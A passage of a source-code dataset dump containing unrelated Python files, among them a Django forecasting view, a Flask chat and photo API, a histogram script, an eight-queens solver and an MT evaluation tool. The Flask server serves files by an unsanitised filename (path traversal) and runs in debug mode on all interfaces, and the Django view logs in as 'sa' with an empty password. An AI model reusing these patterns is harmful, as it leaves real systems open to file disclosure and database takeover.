HttpResponseRedirect\nimport json \nimport pyodbc\nfrom django.http.response import JsonResponse\nfrom .queries import getQuery,query2,query3\n\n\ndef testodbc(request, cname=\"\"):\n #conn = pyodbc.connect('DRIVER={SQL Server Native Client 11.0};SERVER=acct-svr;DATABASE=quickbooks15_opensync2FF;UID=sa;PWD=')\n conn = pyodbc.connect('DRIVER={SQL Server Native Client 11.0};SERVER=acct-svr;DATABASE=quickbooks15_opensync2;UID=sa;PWD=')\n c = conn.cursor() \n\n\n customers = []\n itemz = []\n #curs = c.execute(getQuery(cname))\n curs = c.execute(query3)\n res = c.fetchall()\n results = []\n results_c = []\n results_w = []\n crims = []\n whites = []\n d1,d2,d3 = [],[],[]\n columns = [column[0] for column in curs.description]\n for row in res:\n results.append(dict(zip(columns, row)))\n i = 0\n while i < len(results):\n if results[i].get('type') == \"Crimini\":\n results_c.append(results[i])\n i += 1\n elif results[i].get('type') == \"White\":\n results_w.append(results[i])\n i += 1\n else:\n i += 1\n dayz = []\n for x in results_c:\n if x['saledate'] in dayz:\n pass\n else:\n dayz.append(x['saledate'])\n # xi = 0\n # while xi < len(results_c):\n for x in results_c:\n if x['saledate'] == dayz[0]:\n d1 += [x]\n elif x['saledate'] == dayz[1]:\n d2 += [x]\n elif x['saledate'] == dayz[2]:\n d3 += [x]\n else:\n pass\n\n \n\n \n template_name = 'testodbc.html'\n #context = {'results':customers,'itemz':itemz}\n context = {\"resz\":results_w, \"resz_c\":results_c,\"day1\":d1,\"day2\":d2,\"day3\":d3}\n return render(request,template_name,context)\n\n\n #if request.method == 'GET':\n #return JsonResponse(results,safe=False)\n\n\n ###############WORKING#############################\n # i = 0\n # while i < len(results):\n # if results[i].get('type') == \"Crimini\":\n # crims.append(results[i].get('totalcasez'))\n # i += 1\n # elif results[i].get('type') == \"White\":\n # whites.append(results[i].get('totalcasez'))\n # i += 1\n # else:\n # i += 1\n\n # total_crims = 0\n # for i in crims:\n # total_crims += i\n\n # total_whites = 0\n # for i in whites:\n # total_whites += i\n ###############WORKING#############################\n # for index in range(len(results)):\n # for key in results[index]:\n # customers.append(results[index]['CustomerRef_FullName'])\n # itemz.append(results[index]['Name'])\n\n #if request.method == 'GET':\n #return JsonResponse(results,safe=False)\n\n#####################################################################################################################\n#####################################################################################################################\n#####################################################################################################################\n#####################################################################################################################\n\n\ndef currentf(request):\n d1 = date.today()\n d2 = d1 + timedelta(days=1)\n d3 = d1 + timedelta(days=2)\n d4 = d1 + timedelta(days=3)\n d5 = d1 + timedelta(days=4)\n obj = Forecast.objects.all()\n lg5pct = 0.25\n\n \n obj2 = obj.aggregate(Sum('day1lbs'))\n obj3 = obj.aggregate(Sum('day2lbs'))\n obj4 = obj.aggregate(Sum('day3lbs'))\n obj5 = obj.aggregate(Sum('day4lbs'))\n #d1ttl = Forecast.objects.filter(Day1lbs > 0)\n # obj2 = obj.aggregate(Sum('totalamount'))\n template_name = 'fcast.html'\n total5 = (lg5pct * obj2['day1lbs__sum']/5)\n total5_2 = (lg5pct * obj3['day2lbs__sum']/5)\n total5_3 = (lg5pct * obj4['day3lbs__sum']/5)\n total5_4 = (lg5pct * obj5['day4lbs__sum']/5)\n #total5_5 = (lg5pct * obj2['day5lbs__sum']/5)\n context = {\"forecastOBJ\":obj,\"d1\":d1,\"d2\":d2,\"d3\":d3,\"d4\":d4,\"d5\":d5,\"lbs\":obj2,\"test1\":total5,\"test2\":total5_2,\"test3\":total5_3,\"test4\":total5_4}\n\n\n return render(request,template_name,context)\n\n\ndef fcastedit(request):\n rmadd = request.POST.get('addroom')\n obj3 = Forecast.objects.all() \n ###########################################DAY SHIFT###################################################################\n for evt in obj3:\n if evt.shiftupdate != datetime.date.today():\n for rec in obj3:\n rec.day1lbs = rec.day2lbs\n rec.day2lbs = rec.day3lbs\n rec.day3lbs = 0\n rec.eclass = 'not-saved'\n rec.shiftupdate = datetime.date.today()\n ##########################################UPDATING A ROOMS' VALUES######################################################\n if request.method == 'POST' and rmadd == None:\n print(request.POST.get('delcheckbox'))\n d1update= request.POST.get('day1')\n d2update= request.POST.get('day2')\n d3update= request.POST.get('day3')\n onetosave = Forecast.objects.get(roomno = request.POST.get('roomno'))\n onetosave.day1lbs = d1update\n onetosave.day2lbs = d2update\n onetosave.day3lbs = d3update\n onetosave.updated = datetime.date.today()\n onetosave.eclass = 'input-box'\n if request.POST.get('delcheckbox') == None:\n onetosave.save()\n else:\n onetosave.delete()\n \n return HttpResponseRedirect(\"/fcast/all\")\n\n #########################################ADDING A ROOM###################################################################\n if rmadd:\n Forecast.objects.create(roomno = rmadd,updated = datetime.date.today(),shiftupdate = datetime.date.today())\n rmadd = None\n return HttpResponseRedirect(\"/fcast/all\")\n\n #########################################################################################################################\n template_name = 'update.html'\n context = {'obj3':obj3}\n return render(request,template_name,context)\n\n\ndef addroom(request):\n roomtoadd = request.POST.get('addme')\n print(roomtoadd)\n obj = Forecast.objects.create(roomno = roomtoadd)\n form = ForecastForm(request.POST or None,instance=obj)\n if form.is_valid():\n form.save()\n template_name = 'update.html'\n context = {'form':form}\n return render(request,template_name,context)\n\ndef fcastall(request):\n #obj = Forecast.objects.all()\n form = FcastAllForm(request.POST or None)\n if form.is_valid():\n print(form.cleaned_data)\n template_name = 'form2.html'\n context = {'newform':form}\n return render(request,template_name,context)\n\n\n\n\n \n","sub_path":"src/djangolite/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7020,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"492670999","text":"import matplotlib.pyplot as plt\n\nblood_sugar_men = [113, 85, 90, 150, 149, 88, 93, 115, 135, 80, 77, 82, 129]\nblood_sugar_women = [67, 98, 89, 120, 133, 150, 84, 69, 89, 79, 120, 112, 100]\n\ntype = [blood_sugar_men, blood_sugar_women]\ncolors = ['g', 'r']\nlabel = ['men', 'women']\nbins = [80, 100, 125, 150]\nplt.xlabel(\"Blood Sugar Range\")\nplt.ylabel(\"Total no. of patients\")\n# Diabetic blood_sugar range\n#\n# 80 - 100 = normal\n# 100 - 125 = pre-diabetic\n# above 125 = diabetic\n\nplt.hist(type, bins=bins, rwidth=0.95, color=colors,\n label=label, orientation=\"horizontal\")\n\nplt.title(\"Blood Sugar Level Chart\")\nplt.legend()\nplt.show()","sub_path":"histogram.py","file_name":"histogram.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"329385589","text":"#!/usr/bin/env python3\nfrom argparse import ArgumentParser\nfrom importlib import import_module\nimport os\nimport time\n\n\ndef main():\n parser = ArgumentParser()\n parser.add_argument('test_case')\n parser.add_argument('-c', '--concurrency', type=int, default=1)\n parser.add_argument('-n', '--num-tasks', type=int, default=1)\n parser.add_argument('--pid-file')\n opts = parser.parse_args()\n\n if opts.pid_file:\n with open(opts.pid_file, 'w') as out:\n out.write(str(os.getpid()))\n \n # Sleep a bit to give profilng tools a time\n # to start their work\n time.sleep(0.01)\n\n mod = import_module('case.%s' % opts.test_case)\n\n print('Loading tasks into queue')\n taskq = []\n for _ in range(opts.num_tasks):\n taskq.append('https://en.wikipedia.org/wiki/Python_(programming_language)')\n\n print('Starting test, c=%d, n=%d' % (opts.concurrency, opts.num_tasks))\n mod.run(taskq, opts.concurrency)\n print('Test finished')\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"runtest.py","file_name":"runtest.py","file_ext":"py","file_size_in_byte":1018,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"54849380","text":"import flask\r\nfrom flask import jsonify, request, send_file\r\nfrom datetime import datetime\r\nfrom db import open_db, close_db\r\nimport os\r\n\r\napp = flask.Flask(__name__)\r\napp.config['DEBUG'] = True\r\n\r\n\r\n@app.route('/api/v1/send', methods=['GET', 'POST']) #percorso per ricezione\r\ndef send():\r\n if request.method == 'POST': # Se la richiesta è di tipo post il client sta inviando un'immagine\r\n photo = request.files['file'] # prendo il nome della foto es: foto.png\r\n\r\n name, ext = os.path.splitext(photo.filename) # divido nome file ed estensione\r\n if ext not in ('.png', '.jpg', '.jpeg'): # verifico che l'estensione sia valida\r\n return 'Non hai inviato una foto!'\r\n\r\n save_path = 'Server_photo_storage' # la path dove salvo le foto dei client da inviare\r\n\r\n if not os.path.exists(save_path): # se il percorso sopracitato non esiste lo creo\r\n os.makedirs(save_path)\r\n\r\n file_path = f\"{save_path}/{photo.filename}\" # creo il percorso finale dove salvero il file\r\n\r\n photo.save(file_path) # salvo la foto\r\n\r\n conn = open_db() # apro il database\r\n cur = conn.cursor()\r\n\r\n query_parameters = request.args # parametri dell'url\r\n\r\n text = '📷[%s] salvato in Client_photo_storage/received_photo/%s' % (str(file_path).split('/')[-1], str(file_path).split('/')[1]) # sebbene avrei potuto usare il parametro text come una descrizione della\r\n # foto ho deciso di sfruttarlo per infromare l'utente il percorso di salvataggio\r\n sender_id = query_parameters.get('sender_id') # determino chi è il mittente\r\n receiver_id = query_parameters.get('receiver_id') # determino chi è il destinario\r\n\r\n # inserisco nella tabella del Server il messaggio settando is_received = 0 finche non arriverà la prima richiesta all'url recv da parte del client\r\n cur.execute(\r\n 'INSERT INTO Server_messages(receiver_id, sender_id, text, time, is_received, is_photo, photo_path) VALUES(?,?,?,?,?,?,?)',\r\n (receiver_id, sender_id, text, datetime.timestamp(datetime.now()), 0, 1, file_path,))\r\n\r\n conn.commit()\r\n\r\n conn.close()\r\n\r\n return f\"Il server ha ricevuto correattamente la foto!\"\r\n\r\n else:\r\n # discorso analogo a sopra\r\n conn = open_db()\r\n cur = conn.cursor()\r\n\r\n query_parameters = request.args\r\n\r\n text = str(query_parameters.get('text')).replace('+', ' ')\r\n sender_id = query_parameters.get('sender_id')\r\n receiver_id = query_parameters.get('receiver_id')\r\n\r\n cur.execute('INSERT INTO Server_messages(receiver_id, sender_id, text, time, is_received, is_photo) VALUES(?,?,?,?,?,?)', (receiver_id, sender_id, text, datetime.timestamp(datetime.now()), 0, 0))\r\n conn.commit()\r\n\r\n conn.close()\r\n\r\n\r\n@app.route('/api/v1/download_photo', methods=['GET']) # api che mi consente di scaricare l'immagine richiesta\r\ndef download_photo():\r\n query_parameters = request.args # parametri url( in questo caso abbiamo ?photo_name=)\r\n photo_name = str(query_parameters.get('photo_name')) # il nome della foto\r\n\r\n return send_file('Server_photo_storage/%s' % photo_name, as_attachment=True) # cerco nella cartella Server_photo l'immagine con il nome ricevuto come parametro\r\n # il programma si puo' migliorare salvando le foto mandate dai client con un nuovo nome generato da token per evitare sovracrivamenti\r\n\r\n\r\n@app.route('/api/v1/receive', methods=['GET']) # api per la ricezione di nuovi messaggi\r\ndef receive():\r\n def dict_factory(cursor, row): # funzione(presa online) che consente di accedere ai valori attraverso i nomi dei campi\r\n d = {}\r\n for idx, col in enumerate(cursor.description):\r\n d[col[0]] = row[idx]\r\n return d\r\n\r\n conn = open_db() # apro il db\r\n conn.row_factory = dict_factory # vedere la funzione\r\n\r\n cur = conn.cursor()\r\n\r\n query_parameters = request.args # parametri ricevuti\r\n\r\n receiver_id = query_parameters.get('receiver_id') # prendo il receiver_id per prendere solo i messaggi indirizzati al destinatario richiesto\r\n\r\n messages = cur.execute('SELECT * FROM Server_messages WHERE is_received = 0 AND receiver_id = ?', (receiver_id,)).fetchall() # assegno a message il dizionario finale da inviare al client\r\n # setto la variabile is_received = 1\r\n\r\n cur.execute('UPDATE Server_messages SET is_received = 1 WHERE receiver_id = ?', (receiver_id,))\r\n conn.commit()\r\n\r\n close_db(conn)\r\n\r\n return jsonify(messages) # effettuo il json e lo ritorno\r\n\r\n\r\n@app.route('/api/v1/user_list', methods=['GET']) # semplice url per stampare i nome e gli id degli utenti\r\ndef users_list():\r\n def dict_factory(cursor, row): # funzione spiegata in receive()\r\n d = {}\r\n for idx, col in enumerate(cursor.description):\r\n d[col[0]] = row[idx]\r\n return d\r\n\r\n conn = open_db()\r\n conn.row_factory = dict_factory\r\n\r\n cur = conn.cursor()\r\n\r\n users_list = cur.execute('SELECT * FROM users WHERE 1=1').fetchall()\r\n\r\n close_db(conn)\r\n\r\n return jsonify(users_list) # ritorno il json\r\n\r\n\r\nwhile __name__ == \"__main__\":\r\n app.run(host='0.0.0.0')\r\n","sub_path":"Sylla_Flask_Api_Chat/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":5621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"333437671","text":"from copy import deepcopy\n\n\ndef place_queens(columns, row, results):\n if row == 8:\n results.append(deepcopy(columns))\n else:\n for col in range(8):\n if check_valid(columns, row, col):\n columns[row] = col\n place_queens(columns, row + 1, results)\n\n\ndef check_valid(columns, row, col):\n for r in range(row):\n # Check column.\n c = columns[r]\n if c == col:\n return False\n \n # Check diagonal.\n col_dist = abs(c - col)\n row_dist = row - r\n if col_dist == row_dist:\n return False\n return True\n\n\ndef main():\n results = []\n place_queens([0 for i in range(8)], 0, results)\n print(results)\n\n\nmain()","sub_path":"ctci/ch8/8queens.py","file_name":"8queens.py","file_ext":"py","file_size_in_byte":739,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"105814136","text":"# Overall imports\nimport argparse\nimport operator\n\n# In-package imports\nimport ngram_utils\nimport stat_utils\nimport corpus_utils\nimport sign_utils\nimport scorers\nimport bucketers\nimport arg_utils\nimport print_utils\n\n\ndef print_score_report(ref, out1, out2,\n score_type='bleu',\n bootstrap=0):\n \"\"\"\n Print a report comparing overall scores of the two systems.\n\n Args:\n ref: Tokens from the reference\n out1: Tokens from the output file 1\n out2: Tokens from the output file 2\n score_type: A string specifying the scoring type (bleu/length)\n \"\"\"\n scorer = scorers.create_scorer_from_profile(score_type)\n print(f'{scorer.name()}:')\n score1, str1 = scorer.score_corpus(ref,out1)\n score2, str2 = scorer.score_corpus(ref,out2)\n if str1 is not None:\n print(f' Sys1: {score1} ({str1})\\n Sys2: {score2} ({str2})')\n else:\n print(f' Sys1: {score1}\\n Sys2: {score2}')\n\n if int(bootstrap) > 0:\n print('Significance test. This may take a while.')\n wins, sys1_stats, sys2_stats = sign_utils.eval_with_paired_bootstrap(ref, out1, out2, score_type=score_type, num_samples=int(bootstrap))\n\n print('Win ratio: Sys1=%.3f, Sys2=%.3f, tie=%.3f' % (wins[0], wins[1], wins[2]))\n if wins[0] > wins[1]:\n print('(Sys1 is superior with p value p=%.3f)\\n' % (1-wins[0]))\n elif wins[1] > wins[0]:\n print('(Sys2 is superior with p value p=%.3f)\\n' % (1-wins[1]))\n\n print('Sys1: mean=%.3f, median=%.3f, 95%% confidence interval=[%.3f, %.3f]' %\n (sys1_stats['mean'], sys1_stats['median'], sys1_stats['lower_bound'], sys1_stats['upper_bound']))\n print('Sys2: mean=%.3f, median=%.3f, 95%% confidence interval=[%.3f, %.3f]' %\n (sys2_stats['mean'], sys2_stats['median'], sys2_stats['lower_bound'], sys2_stats['upper_bound']))\n\ndef print_word_accuracy_report(ref, out1, out2,\n acc_type='fmeas', bucket_type='freq',\n freq_count_file=None, freq_corpus_file=None,\n label_set=None,\n ref_labels=None, out1_labels=None, out2_labels=None):\n \"\"\"\n Print a report comparing the word accuracy.\n\n Args:\n ref: Tokens from the reference\n out1: Tokens from the output file 1\n out2: Tokens from the output file 2\n acc_type: The type of accuracy to show (prec/rec/fmeas). Can also have multiple separated by '+'.\n bucket_type: A string specifying the way to bucket words together to calculate F-measure (freq/tag)\n freq_corpus_file: When using \"freq\" as a bucketer, which corpus to use to calculate frequency.\n By default this uses the frequency in the reference test set, but it's often more informative\n to use the frequency in the training set, in which case you specify the path of the\n training corpus.\n freq_count_file: An alternative to freq_corpus that uses a count file in \"word\\tfreq\" format.\n ref_labels: either a filename of a file full of reference labels, or a list of strings corresponding to `ref`.\n out1_labels: output 1 labels. must be specified if ref_labels is specified.\n out2_labels: output 2 labels. must be specified if ref_labels is specified.\n \"\"\"\n acc_type_map = {'prec': 3, 'rec': 4, 'fmeas': 5}\n bucketer = bucketers.create_word_bucketer_from_profile(bucket_type,\n freq_count_file=freq_count_file,\n freq_corpus_file=freq_corpus_file,\n freq_data=ref,\n label_set=label_set)\n ref_labels = corpus_utils.load_tokens(ref_labels) if type(ref_labels) == str else ref_labels\n out1_labels = corpus_utils.load_tokens(out1_labels) if type(out1_labels) == str else out1_labels\n out2_labels = corpus_utils.load_tokens(out2_labels) if type(out2_labels) == str else out2_labels\n matches1 = bucketer.calc_bucketed_matches(ref, out1, ref_labels=ref_labels, out_labels=out1_labels)\n matches2 = bucketer.calc_bucketed_matches(ref, out2, ref_labels=ref_labels, out_labels=out2_labels)\n acc_types = acc_type.split('+')\n for at in acc_types:\n if at not in acc_type_map:\n raise ValueError(f'Unknown accuracy type {at}')\n aid = acc_type_map[at]\n print(f'--- word {acc_type} by {bucketer.name()} bucket')\n for bucket_str, match1, match2 in zip(bucketer.bucket_strs, matches1, matches2):\n print(\"{}\\t{:.4f}\\t{:.4f}\".format(bucket_str, match1[aid], match2[aid]))\n print()\n\ndef print_src_word_accuracy_report(src, ref, out1, out2, ref_align, out1_align, out2_align,\n acc_type='fmeas', bucket_type='freq',\n freq_count_file=None, freq_corpus_file=None,\n label_set=None,\n src_labels=None):\n \"\"\"\n Print a report for source word analysis.\n\n Args:\n src: Tokens from the source\n ref: Tokens from the reference\n out1: Tokens from the output file 1\n out2: Tokens from the output file 2\n ref_align: Alignment file for the reference\n out1_align: Alignment file for the output file 1\n out2_align: Alignment file for the output file 2\n acc_type: The type of accuracy to show (prec/rec/fmeas). Can also have multiple separated by '+'.\n bucket_type: A string specifying the way to bucket words together to calculate F-measure (freq/tag)\n freq_corpus_file: When using \"freq\" as a bucketer, which corpus to use to calculate frequency.\n By default this uses the frequency in the reference test set, but it's often more informative\n se the frequency in the training set, in which case you specify the path of the target side\n he training corpus.\n freq_count_file: An alternative to freq_corpus that uses a count file in \"word\\tfreq\" format.\n src_labels: either a filename of a file full of source labels, or a list of strings corresponding to `ref`.\n \"\"\"\n ref_align, out1_align, out2_align = [corpus_utils.load_tokens(x) for x in (ref_align, out1_align, out2_align)]\n acc_type_map = {'prec': 3, 'rec': 4, 'fmeas': 5}\n bucketer = bucketers.create_word_bucketer_from_profile(bucket_type,\n freq_count_file=freq_count_file,\n freq_corpus_file=freq_corpus_file,\n freq_data=src,\n label_set=label_set)\n src_labels = corpus_utils.load_tokens(src_labels) if type(src_labels) == str else src_labels\n matches1 = bucketer.calc_source_bucketed_matches(src, ref, out1, ref_align, out1_align, src_labels=src_labels)\n matches2 = bucketer.calc_source_bucketed_matches(src, ref, out2, ref_align, out2_align, src_labels=src_labels)\n acc_types = acc_type.split('+')\n for at in acc_types:\n if at not in acc_type_map:\n raise ValueError(f'Unknown accuracy type {at}')\n aid = acc_type_map[at]\n print(f'--- word {acc_type} by {bucketer.name()} bucket')\n for bucket_str, match1, match2 in zip(bucketer.bucket_strs, matches1, matches2):\n print(\"{}\\t{:.4f}\\t{:.4f}\".format(bucket_str, match1[aid], match2[aid]))\n print()\n\ndef print_sentence_bucketed_report(ref, out1, out2,\n bucket_type='score', statistic_type='count',\n score_measure='bleu'):\n \"\"\"\n Print a report of sentences by bucket\n\n Args:\n ref: Tokens from the reference\n out1: Tokens from the output file 1\n out2: Tokens from the output file 2\n bucket_type: The type of bucketing method to use\n score_measure: If using 'score' as either bucket_type or statistic_type, which scorer to use\n \"\"\"\n bucketer = bucketers.create_sentence_bucketer_from_profile(bucket_type, score_type=score_measure)\n bc1 = bucketer.create_bucketed_corpus(out1, ref=ref)\n bc2 = bucketer.create_bucketed_corpus(out2, ref=ref)\n\n if statistic_type == 'count':\n aggregator = lambda out,ref: len(out)\n elif statistic_type == 'score':\n scorer = scorers.create_scorer_from_profile(score_measure)\n aggregator = lambda out,ref: scorer.score_corpus(ref,out)[0]\n else:\n raise ValueError(f'Illegal statistic_type {statistic_type}')\n\n stats1 = [aggregator(out,ref) for (out,ref) in bc1]\n stats2 = [aggregator(out,ref) for (out,ref) in bc2]\n\n print(f'--- bucket_type={bucket_type}, statistic_type={statistic_type}, score_measure={score_measure}')\n for bs, s1, s2 in zip(bucketer.bucket_strs, stats1, stats2):\n print(f'{bs}\\t{s1}\\t{s2}')\n print()\n\ndef print_ngram_report(ref, out1, out2,\n min_ngram_length=1, max_ngram_length=4,\n report_length=50, alpha=1.0, compare_type='match',\n ref_labels=None, out1_labels=None, out2_labels=None):\n \"\"\"\n Print a report comparing aggregate n-gram statistics\n\n Args:\n ref: Tokens from the reference\n out1: Tokens from the output file 1\n out2: Tokens from the output file 2\n min_ngram_length: minimum n-gram length\n max_ngram_length: maximum n-gram length\n report_length: the number of n-grams to report\n alpha: when sorting n-grams for salient features, the smoothing coefficient. A higher smoothing coefficient\n will result in more frequent phenomena (sometimes this is good).\n compare_type: what type of statistic to compare\n (match: n-grams that match the reference, over: over-produced ngrams, under: under-produced ngrams)\n ref_labels: either a filename of a file full of reference labels, or a list of strings corresponding to `ref`.\n If specified, will aggregate statistics over labels instead of n-grams.\n out1_labels: output 1 labels. must be specified if ref_labels is specified.\n out2_labels: output 2 labels. must be specified if ref_labels is specified.\n \"\"\"\n print(f'--- min_ngram_length={min_ngram_length}, max_ngram_length={max_ngram_length}')\n print(f' report_length={report_length}, alpha={alpha}, compare_type={compare_type}')\n if type(ref_labels) == str:\n print(f' ref_labels={ref_labels}, out1_labels={out1_labels}, out2_labels={out2_labels}')\n print()\n\n ref_labels = corpus_utils.load_tokens(ref_labels) if type(ref_labels) == str else ref_labels\n out1_labels = corpus_utils.load_tokens(out1_labels) if type(out1_labels) == str else out1_labels\n out2_labels = corpus_utils.load_tokens(out2_labels) if type(out2_labels) == str else out2_labels\n total1, match1, over1, under1 = ngram_utils.compare_ngrams(ref, out1, ref_labels=ref_labels, out_labels=out1_labels,\n min_length=min_ngram_length, max_length=max_ngram_length)\n total2, match2, over2, under2 = ngram_utils.compare_ngrams(ref, out2, ref_labels=ref_labels, out_labels=out2_labels,\n min_length=min_ngram_length, max_length=max_ngram_length)\n if compare_type == 'match':\n scores = stat_utils.extract_salient_features(match1, match2, alpha=alpha)\n elif compare_type == 'over':\n scores = stat_utils.extract_salient_features(over1, over2, alpha=alpha)\n elif compare_type == 'under':\n scores = stat_utils.extract_salient_features(under1, under2, alpha=alpha)\n else:\n raise ValueError(f'Illegal compare_type \"{compare_type}\"')\n scorelist = sorted(scores.items(), key=operator.itemgetter(1), reverse=True)\n\n print(f'--- {report_length} n-grams that System 1 had higher {compare_type}')\n for k, v in scorelist[:report_length]:\n print('{}\\t{} (sys1={}, sys2={})'.format(' '.join(k), v, match1[k], match2[k]))\n print(f'\\n--- {report_length} n-grams that System 2 had higher {compare_type}')\n for k, v in reversed(scorelist[-report_length:]):\n print('{}\\t{} (sys1={}, sys2={})'.format(' '.join(k), v, match1[k], match2[k]))\n print()\n\ndef print_sentence_examples(ref, out1, out2,\n score_type='sentbleu',\n report_length=10):\n \"\"\"\n Print examples of sentences that satisfy some criterion, usually score of one system better\n\n Args:\n ref: Tokens from the reference\n out1: Tokens from the output file 1\n out2: Tokens from the output file 2\n score_type: The type of scorer to use\n report_length: Number of sentences to print for each system being better or worse\n \"\"\"\n scorer = scorers.create_scorer_from_profile(score_type)\n sname = scorer.name()\n scorediff_list = []\n for i, (o1, o2, r) in enumerate(zip(out1, out2, ref)):\n s1, str1 = scorer.score_sentence(r, o1)\n s2, str2 = scorer.score_sentence(r, o2)\n scorediff_list.append((s2-s1, s1, s2, str1, str2, i))\n scorediff_list.sort()\n print(f'--- {report_length} sentences where Sys1>Sys2 at {sname}')\n for bdiff, s1, s2, str1, str2, i in scorediff_list[:report_length]:\n print ('sys2-sys1={}, sys1={}, sys2={}\\nRef: {}\\nSys1: {}\\nSys2: {}\\n'.format(bdiff, s1, s2, ' '.join(ref[i]), ' '.join(out1[i]), ' '.join(out2[i])))\n print(f'--- {report_length} sentences where Sys2>Sys1 at {sname}')\n for bdiff, s1, s2, str1, str2, i in scorediff_list[-report_length:]:\n print ('sys2-sys1={}, sys1={}, sys2={}\\nRef: {}\\nSys1: {}\\nSys2: {}\\n'.format(bdiff, s1, s2, ' '.join(ref[i]), ' '.join(out1[i]), ' '.join(out2[i])))\n\n\nif __name__ == '__main__':\n\n parser = argparse.ArgumentParser(\n description='Program to compare MT results',\n )\n parser.add_argument('ref_file', type=str,\n help='A path to a correct reference file')\n parser.add_argument('out1_file', type=str,\n help='A path to a system output')\n parser.add_argument('out2_file', type=str,\n help='A path to another system output')\n parser.add_argument('--src_file', type=str, default=None,\n help='A path to the source file')\n parser.add_argument('--compare_scores', type=str, nargs='*',\n default=['score_type=bleu,bootstrap=0', 'score_type=length,bootstrap=0'],\n help=\"\"\"\n Compare scores. Can specify arguments in 'arg1=val1,arg2=val2,...' format.\n See documentation for 'print_score_report' to see which arguments are available.\n \"\"\")\n parser.add_argument('--compare_word_accuracies', type=str, nargs='*',\n default=['bucket_type=freq'],\n help=\"\"\"\n Compare word accuracies by buckets. Can specify arguments in 'arg1=val1,arg2=val2,...' format.\n See documentation for 'print_word_accuracy_report' to see which arguments are available.\n \"\"\")\n parser.add_argument('--compare_src_word_accuracies', type=str, nargs='*',\n default=None,\n help=\"\"\"\n Source analysis. Can specify arguments in 'ref_align=file1,out1_align=file2,out2_align=file3,...' format.\n See documentation for 'print_src_word_accuracy_report' to see which arguments are available.\n \"\"\")\n parser.add_argument('--compare_sentence_buckets', type=str, nargs='*',\n default=['bucket_type=score,score_measure=sentbleu',\n 'bucket_type=lengthdiff',\n 'bucket_type=length,statistic_type=score,score_measure=bleu'],\n help=\"\"\"\n Compare sentence counts by buckets. Can specify arguments in 'arg1=val1,arg2=val2,...' format.\n See documentation for 'print_sentence_buckets_report' to see which arguments are available.\n \"\"\")\n parser.add_argument('--compare_ngrams', type=str, nargs='*',\n default=['compare_type=match'],\n help=\"\"\"\n Compare ngrams. Can specify arguments in 'arg1=val1,arg2=val2,...' format.\n See documentation for 'print_ngram_report' to see which arguments are available.\n \"\"\")\n parser.add_argument('--compare_sentence_examples', type=str, nargs='*',\n default=['score_type=sentbleu'],\n help=\"\"\"\n Compare sentences. Can specify arguments in 'arg1=val1,arg2=val2,...' format.\n See documentation for 'print_sentence_examples' to see which arguments are available.\n \"\"\")\n args = parser.parse_args()\n\n ref, out1, out2 = [corpus_utils.load_tokens(x) for x in (args.ref_file, args.out1_file, args.out2_file)]\n src = corpus_utils.load_tokens(args.src_file) if args.src_file else None\n\n # Aggregate scores\n if args.compare_scores:\n print_utils.print_header('Aggregate Scores')\n for profile in args.compare_scores:\n kargs = arg_utils.parse_profile(profile)\n print_score_report(ref, out1, out2, **kargs)\n print()\n\n # Word accuracy analysis\n if args.compare_word_accuracies:\n print_utils.print_header('Word Accuracy Analysis')\n for profile in args.compare_word_accuracies:\n kargs = arg_utils.parse_profile(profile)\n print_word_accuracy_report(ref, out1, out2, **kargs)\n print()\n\n # Source word analysis\n if args.compare_src_word_accuracies:\n print_utils.print_header('Source Word Analysis')\n if not src:\n raise ValueError(\"Must specify the source file when performing source analysis.\")\n for profile in args.compare_src_word_accuracies:\n kargs =arg_utils.parse_profile(profile)\n print_src_word_accuracy_report(src, ref, out1, out2, **kargs)\n print()\n\n # Sentence count analysis\n if args.compare_sentence_buckets:\n print_utils.print_header('Sentence Bucket Analysis')\n for profile in args.compare_sentence_buckets:\n kargs = arg_utils.parse_profile(profile)\n print_sentence_bucketed_report(ref, out1, out2, **kargs)\n print()\n\n # n-gram difference analysis\n if args.compare_ngrams:\n print_utils.print_header('N-gram Difference Analysis')\n for profile in args.compare_ngrams:\n kargs = arg_utils.parse_profile(profile)\n print_ngram_report(ref, out1, out2, **kargs)\n print()\n\n # Sentence example analysis\n if args.compare_sentence_examples:\n print_utils.print_header('Sentence Example Analysis')\n for profile in args.compare_sentence_examples:\n kargs = arg_utils.parse_profile(profile)\n print_sentence_examples(ref, out1, out2, **kargs)\n print()\n","sub_path":"compare_mt.py","file_name":"compare_mt.py","file_ext":"py","file_size_in_byte":18597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"53897234","text":"from typing import List, Dict\nfrom bisect import bisect_left\n\nDocId = int\nTerm = str\n\n\nclass Document:\n doc_id: DocId\n tokens: List[Term]\n\n def __init__(self, doc_id: DocId, tokens: List[Term]):\n self.doc_id = doc_id\n self.tokens = tokens\n\n\nclass Postings:\n # здесь мы сознательно в нашем простом случае\n # будем хранить и `doc_count` и `postings`\n # в одном месте\n doc_count: int\n postings: List[DocId]\n\n def __init__(self):\n self.doc_count = 0\n self.postings = []\n\n def __repr__(self):\n return \"Postings(%d, %s)\" % (self.doc_count, str(self.postings))\n\n def append(self, item: DocId):\n self.postings.append(item)\n self.doc_count += 1\n\n\nclass InvertedIndex:\n index: Dict[Term, Postings]\n\n def __init__(self):\n self.index = {}\n\n def add_doc(self, doc: Document):\n for t in doc.tokens:\n if t in self.index:\n p = self.index[t]\n self.insert(doc.doc_id, p)\n else:\n p = Postings()\n p.append(doc.doc_id)\n self.index[t] = p\n\n @staticmethod\n def intersect(p1: List[DocId], p2: List[DocId]) -> List[DocId]:\n result = []\n i = j = 0\n while i < len(p1) and j < len(p2):\n if p1[i] == p2[j]:\n result.append(p1[i])\n i += 1\n j += 1\n elif p1[i] < p2[j]:\n i += 1\n else:\n j += 1\n return result\n\n def intersect_terms(self, terms: List[Term]) -> List[DocId]:\n t = sorted(terms, key=lambda x: self.index[x].doc_count)\n head, *tail = t\n result = self.index[head].postings\n t = tail\n while not t and not result:\n head, *tail = 